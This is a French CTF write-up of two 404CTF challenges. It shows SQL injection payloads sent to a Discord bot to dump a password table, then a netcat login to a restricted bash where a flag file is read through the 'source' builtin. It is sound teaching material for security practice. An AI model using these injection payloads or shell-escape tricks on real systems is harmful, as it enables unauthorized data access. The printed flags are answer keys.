# Un utilisateur suspicieux [1/2]

Il semblerait qu'il y ait un utilisateur suspicieux sur le serveur discord du 404CTF. Allez voir ce que veut `Je suis un gentil humain#0364`

Auteur : `Typhlos#9037`

**Solution**

Évidemment, cet utilisateur est un bot. Dans la suite, `>` représente les commandes envoyées, et `<` les réponses reçues.

```
> !aide

< Je ne suis pas un automate, juste un humain qui veut aider :-)
< Commandes disponibles :
< !chercher argument -> rechercher argument dans la base de données
< !authentification motdepasse -> authentifiez vous pour accéder au mode privilégié
< !drapeau -> obtenez un mystérieux drapeau

> !chercher m%

< Results:
< Result #1:
< >mot de passe
< Result #2:
< >ennemi
< Result #3:
< >ministère des armées
< Result #4:
< >telecom sudparis
< Result #5:
< >hackademint
< Result #6:
< >minet
```

Bon, ça ressemble à une requête SQL avec un `LIKE`.

```
> !chercher " or 1=1;#

< Results:
< Result #1:
< >404CTF{Tu croyais que c'était le flag?}
< Result #2:
< >never gonna give you up
< Result #3:
< >top secret
< Result #4:
< >mot de passe
< Result #5:
< >password
< Result #6:
< >flag
< Result #7:
< >drapeau
< Result #8:
< >hallebarde
< Result #9:
< >404CTF
< Result #10:
< >ennemi
< Result #11:
< >allié
< Result #12:
< >attaque
< Result #13:
< >défense
< Result #14:
< >espionnage
< Result #15:
< >dgse
< Result #16:
< >bcra
< Result #17:
< >france
< Result #18:
< >ministère des armées
< Result #19:
< >telecom sudparis
< Result #20:
< >hackademint
< Result #21:
< >minet
```

Bonne nouvelle, c'est parfaitement injectable. On essaie de récupérer des tables évidentes (`information_schema.tables`,  `sqlitemaster`, ...) mais ça ne passe pas. Finalement, on tente plein de choses au bol et finalement :

```
> !chercher " union select password from password#

> Results:
> Result #1:
> >404CTF{Tu croyais que c'était le flag?}
> Result #2:
> >never gonna give you up
> Result #3:
> >top secret
> Result #4:
> >mot de passe
> Result #5:
> >password
> Result #6:
> >flag
> Result #7:
> >drapeau
> Result #8:
> >hallebarde
> Result #9:
> >404CTF
> Result #10:
> >ennemi
> Result #11:
> >allié
> Result #12:
> >attaque
> Result #13:
> >défense
> Result #14:
> >espionnage
> Result #15:
> >dgse
> Result #16:
> >bcra
> Result #17:
> >france
> Result #18:
> >ministère des armées
> Result #19:
> >telecom sudparis
> Result #20:
> >hackademint
> Result #21:
> >minet
> Result #22:
> >404CTF{D1sc0rd_&_injection_SQL}

> !authentification 404CTF{D1sc0rd_&_injection_SQL}

< Bravo ! Vous pouvez valider le challenge avec le mot de passe
```

Le flag est donc `404CTF{D1sc0rd_&_injection_SQL}`.


#  Un utilisateur suspicieux [2/2]

Nous pensons maintenant qu'il s'agit d'un agent de Hallebarde. Essayez de lui tirer les vers du nez.

Si jamais vous devez vous réauthentifier auprès du bot, vous pouvez utiliser le flag du challenge précédent `404CTF{D1sc0rd_&_injection_SQL}`

Auteur : `Woni`

**Solution**

On retourne causer avec notre bot :

```
> !aide

< Je ne suis pas un automate, juste un humain qui veut aider :-)
< Commandes disponibles :
< !chercher argument -> rechercher argument dans la base de données
< !authentification motdepasse -> authentifiez vous pour accéder au mode privilégié
< !drapeau -> obtenez un mystérieux drapeau
< !debug -> debug command
```

Maintenant qu'on est authentifié, il ya une commande `debug` en plus.

```
> !debug

> Debug déployé sur le port 31337 ! Mot de passe : p45_uN_4uT0m4t3
```

Je mets un moment pour comprendre ce qu'il est en train de me dire. Un port sur bot Discord ? WTF ? Finalement, on se raccroche à ce que l'on a, c'est à dire le site web du CTF :

```console
$ nc ctf.404ctf.fr 31337
Veuillez entrer le mot de passe :
p45_uN_4uT0m4t3    
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ ls
ls
bash: ls: command not found
```

Ah, un shell retreint. Challenge accepté ! On se rend compte rapidement que toutes les commandes que l'on essaie finissent en `not found`, que l'environnement est limité et en lecture seule. 

```console
bash-4.4$ set
BASH=/bin/bash
BASHOPTS=cmdhist:complete_fullquote:extquote:force_fignore:hostcomplete:interactive_comments:progcomp:promptvars:sourcepath
BASH_ALIASES=()
BASH_ARGC=()
BASH_ARGV=()
BASH_CMDS=()
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="4" [1]="4" [2]="20" [3]="1" [4]="release" [5]="x86_64-pc-linux-gnu")
BASH_VERSION='4.4.20(1)-release'
DIRSTACK=()
EUID=65534
GROUPS=()
HOSTNAME=NSJAIL
HOSTTYPE=x86_64
IFS=$' \t\n'
MACHTYPE=x86_64-pc-linux-gnu
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PIPESTATUS=([0]="127")
PPID=2
PS4='+ '
PWD=/app
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments
SHLVL=3
TERM=dumb
UID=65534
_=env
bash-4.4$ export SHELL=/bin/bash
bash: line 13: SHELL: readonly variable
```

Finalement, on n'a que les built-ins pour avancer. Par exemple, on explore le système de fichier :

```
bash-4.4$ echo /*
echo /*
/app /bin /lib /lib64 /proc
bash-4.4$ echo /app/*
echo /app/*
/app/auth_wall.sh /app/flag.txt
```

Bon, le flag est là. Mais comment le lire sans `cat`, et le reste ? Par les built-ins, pardi !

```
bash-4.4$ source flag.txt
source flag.txt
bash: 404CTF{17_s_4g155417_3n_f4iT_d_1_b0t}: command not found
```

Le flag est donc `404CTF{17_s_4g155417_3n_f4iT_d_1_b0t}`.